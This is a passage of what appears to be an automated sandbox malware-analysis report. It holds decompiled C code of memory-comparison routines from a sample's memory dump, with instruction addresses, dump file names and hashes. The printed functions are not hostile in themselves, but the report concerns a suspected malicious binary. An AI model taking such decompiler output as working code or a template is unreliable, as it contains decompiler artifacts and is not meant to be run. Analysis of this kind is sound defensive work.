				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}

0x00414250
0x00414250
0x00414256
0x004142d5
0x004142d7
0x004142d9
0x00000000
0x00000000
0x004142df
0x004142e5
0x00414364
0x00414366
0x00414368
0x00000000
0x00000000
0x0041436e
0x00414374
0x004143f3
0x004143f5
0x004143f7
0x00000000
0x00000000
0x004143fd
0x00414403
0x00414482
0x00414484
0x00414486
0x00000000
0x00000000
0x0041448c
0x00414492
0x00414511
0x00414513
0x00414515
0x00000000
0x00000000
0x00414521
0x004145a1
0x004145a3
0x004145a5
0x00000000
0x00000000
0x004145ab
0x004145b1
0x00414630
0x00414632
0x00414634
0x00000000
0x00000000
0x00414642
0x00414644
0x00414655
0x00414655
0x0041424a
0x00414fa6
0x00414fa6
0x004145ba
0x004145bc
0x004145d3
0x004145db
0x004145dd
0x004145f4
0x004145fc
0x004145fe
0x00414615
0x0041461d
0x0041461f
0x0041462c
0x0041462c
0x00000000
0x0041461f
0x0041460b
0x0041460f
0x00000000
0x00000000
0x00000000
0x0041460f
0x004145ea
0x004145ee
0x00000000
0x00000000
0x00000000
0x004145ee
0x004145c9
0x004145cd
0x00000000
0x00000000
0x00000000
0x004145cd
0x0041452b
0x0041452d
0x00414544
0x0041454c
0x0041454e
0x00414565
0x0041456d
0x0041456f
0x00414586
0x0041458e
0x00414590
0x0041459d
0x0041459d
0x00000000
0x00414590
0x0041457c
0x00414580
0x00000000
0x00000000
0x00000000
0x00414580
0x0041455b
0x0041455f
0x00000000
0x00000000
0x00000000
0x0041455f
0x0041453a
0x0041453e
0x00000000
0x00000000
0x00000000
0x0041453e
0x0041449b
0x0041449d
0x004144b4
0x004144bc
0x004144be
0x004144d5
0x004144dd
0x004144df
0x004144f6
0x004144fe
0x00414500
0x0041450d
0x0041450d
0x00000000
0x00414500
0x004144ec
0x004144f0
0x00000000
0x00000000
0x00000000
0x004144f0
0x004144cb
0x004144cf
0x00000000
0x00000000
0x00000000
0x004144cf
0x004144aa
0x004144ae
0x00000000
0x00000000
0x00000000
0x004144ae
0x0041440c
0x0041440e
0x00414425
0x0041442d
0x0041442f
0x00414446
0x0041444e
0x00414450
0x00414467
0x0041446f
0x00414471
0x0041447e
0x0041447e
0x00000000
0x00414471
0x0041445d
0x00414461
0x00000000
0x00000000
0x00000000
0x00414461
0x0041443c
0x00414440
0x00000000
0x00000000
0x00000000
0x00414440
0x0041441b
0x0041441f
0x00000000
0x00000000
0x00000000
0x0041441f
0x0041437d
0x0041437f
0x00414396
0x0041439e
0x004143a0
0x004143b7
0x004143bf
0x004143c1
0x004143d8
0x004143e0
0x004143e2
0x004143ef
0x004143ef
0x00000000
0x004143e2
0x004143ce
0x004143d2
0x00000000
0x00000000
0x00000000
0x004143d2
0x004143ad
0x004143b1
0x00000000
0x00000000
0x00000000
0x004143b1
0x0041438c
0x00414390
0x00000000
0x00000000
0x00000000
0x00414390
0x004142ee
0x004142f0
0x00414307
0x0041430f
0x00414311
0x00414328
0x00414330
0x00414332
0x00414349
0x00414351
0x00414353
0x00414360
0x00414360
0x00000000
0x00414353
0x0041433f
0x00414343
0x00000000
0x00000000
0x00000000
0x00414343
0x0041431e
0x00414322
0x00000000
0x00000000
0x00000000
0x00414322
0x004142fd
0x00414301
0x00000000
0x00000000
0x00000000
0x00414258
0x00414258
0x0041425b
0x0041425f
0x00414261
0x00414278
0x00414278
0x0041427c
0x00414280
0x00414282
0x00414299
0x00414299
0x0041429d
0x004142a1
0x004142a3
0x004142ba
0x004142ba
0x004142be
0x004142c2
0x004142c4
0x004142ca
0x004142cd
0x004142d1
0x004142d1
0x00000000
0x004142c4
0x004142a9
0x004142ac
0x004142b0
0x004142b4
0x00000000
0x00000000
0x00000000
0x004142b4
0x00414288
0x0041428b
0x0041428f
0x00414293
0x00000000
0x00000000
0x00000000
0x00414293
0x00414267
0x0041426a
0x0041426e
0x00414272
0x00000000
0x00000000
0x00000000
0x00414272
0x00413e75
0x00413e75
0x00000000

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 72ab3a9571a0dace12cf911733f11d0778312d0b8b968f66f2a69f79fc5dd33a
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 4FC18E73C0AAF34A8736852D40682ABEE626FD179131FC3E29CD43F389D62A5D8195D4

Uniqueness

Uniqueness Score: -1.00%

Function 00413E7C Relevance: .4, Instructions: 351
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00413E7C(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}

0x00413e7c
0x00413e7c
0x00413e82
0x00413ef5
0x00413ef7
0x00413ef9
0x00000000
0x00000000
0x00413eff
0x00413f05
0x00413f84
0x00413f86
0x00413f88
0x00000000
0x00000000
0x00413f8e
0x00413f94
0x00414013
0x00414015
0x00414017
0x00000000
0x00000000
0x0041401d
0x00414023
0x004140a2
0x004140a4
0x004140a6
0x00000000
0x00000000
0x004140b2
0x00414132
0x00414134
0x00414136
0x00000000
0x00000000
0x0041413c
0x00414142
0x004141c1
0x004141c3
0x004141c5
0x00000000
0x00000000
0x004141cb
0x004141d1
0x00414242
0x00414244
0x00414246
0x00414248
0x00414248
0x0041424a
0x00414fa6
0x00414fa6
0x004141da
0x004141dc
0x004141ed
0x004141f5
0x004141f7
0x00414208
0x00414210
0x00414212
0x00414227
0x0041422f
0x00414231
0x0041423e
0x0041423e
0x00000000
0x00414231
0x0041421b
0x00414221
0x00000000
0x00000000
0x00414223
0x00414223
0x00000000
0x00414223
0x00414200
0x00414206
0x00000000
0x00000000
0x00000000
0x00414206
0x004141e5
0x004141eb
0x00000000
0x00000000
0x00000000
0x004141eb
0x0041414b
0x0041414d
0x00414164
0x0041416c
0x0041416e
0x00414185
0x0041418d
0x0041418f
0x004141a6
0x004141ae
0x004141b0
0x004141bd
0x004141bd
0x00000000
0x004141b0
0x0041419c
0x004141a0
0x00000000
0x00000000
0x00000000
0x004141a0
0x0041417b
0x0041417f
0x00000000
0x00000000
0x00000000
0x0041417f
0x0041415a
0x0041415e
0x00000000
0x00000000
0x00000000
0x0041415e
0x004140bc
0x004140be
0x004140d5
0x004140dd
0x004140df
0x004140f6
0x004140fe
0x00414100
0x00414117
0x0041411f
0x00414121
0x0041412e
0x0041412e
0x00000000
0x00414121
0x0041410d
0x00414111
0x00000000
0x00000000
0x00000000
0x00414111
0x004140ec
0x004140f0
0x00000000
0x00000000
0x00000000
0x004140f0
0x004140cb
0x004140cf
0x00000000
0x00000000
0x00000000
0x004140cf
0x0041402c
0x0041402e
0x00414045
0x0041404d
0x0041404f
0x00414066
0x0041406e
0x00414070
0x00414087
0x0041408f
0x00414091
0x0041409e
0x0041409e
0x00000000
0x00414091
0x0041407d
0x00414081
0x00000000
0x00000000
0x00000000
0x00414081
0x0041405c
0x00414060
0x00000000
0x00000000
0x00000000
0x00414060
0x0041403b
0x0041403f
0x00000000
0x00000000
0x00000000
0x0041403f
0x00413f9d
0x00413f9f
0x00413fb6
0x00413fbe
0x00413fc0
0x00413fd7
0x00413fdf
0x00413fe1
0x00413ff8
0x00414000
0x00414002
0x0041400f
0x0041400f
0x00000000
0x00414002
0x00413fee
0x00413ff2
0x00000000
0x00000000
0x00000000
0x00413ff2
0x00413fcd
0x00413fd1
0x00000000
0x00000000
0x00000000
0x00413fd1
0x00413fac
0x00413fb0
0x00000000
0x00000000
0x00000000
0x00413fb0
0x00413f0e
0x00413f10
0x00413f27
0x00413f2f
0x00413f31
0x00413f48
0x00413f50
0x00413f52
0x00413f69
0x00413f71
0x00413f73
0x00413f80
0x00413f80
0x00000000
0x00413f73
0x00413f5f
0x00413f63
0x00000000
0x00000000
0x00000000
0x00413f63
0x00413f3e
0x00413f42
0x00000000
0x00000000
0x00000000
0x00413f42
0x00413f1d
0x00413f21
0x00000000
0x00000000
0x00000000
0x00413e84
0x00413e84
0x00413e87
0x00413e8b
0x00413e8d
0x00413ea0
0x00413ea0
0x00413ea4
0x00413ea8
0x00413eaa
0x00413ebd
0x00413ebd
0x00413ec1
0x00413ec5
0x00413ec7
0x00413eda
0x00413eda
0x00413ede
0x00413ee2
0x00413ee4
0x00413eea
0x00413eed
0x00413ef1
0x00413ef1
0x00000000
0x00413ee4
0x00413ecd
0x00413ed0
0x00413ed4
0x00413ed8
0x00000000
0x00000000
0x00000000
0x00413ed8
0x00413eb0
0x00413eb3
0x00413eb7
0x00413ebb
0x00000000
0x00000000
0x00000000
0x00413ebb
0x00413e93
0x00413e96
0x00413e9a
0x00413e9e
0x00000000
0x00000000
0x00000000
0x00413e9e
0x00413e75
0x00413e75
0x00000000

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

